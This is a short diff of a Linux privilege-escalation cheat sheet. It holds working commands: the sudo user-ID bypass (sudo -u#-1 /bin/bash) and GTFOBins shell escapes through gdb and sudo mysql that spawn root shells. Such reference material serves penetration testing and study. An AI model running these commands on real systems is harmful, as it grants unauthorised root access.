TheProdigyLeague/Code.exe/Methodology and Resources/Linux - Privilege Escalation.md

 (ALL, !root) ALL

 # If you have a full TTY, you can exploit it like this
-sudo -u#-1 /bin/bash
+$ sudo -u#-1 /bin/bash
-sudo -u#4294967295 id
+$ sudo -u#4294967295 id
 ```

 ## GTFOBins

 [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

-The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
+*The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.

 > gdb -nx -ex '!sh' -ex quit
 > sudo mysql -e '\! /bin/sh'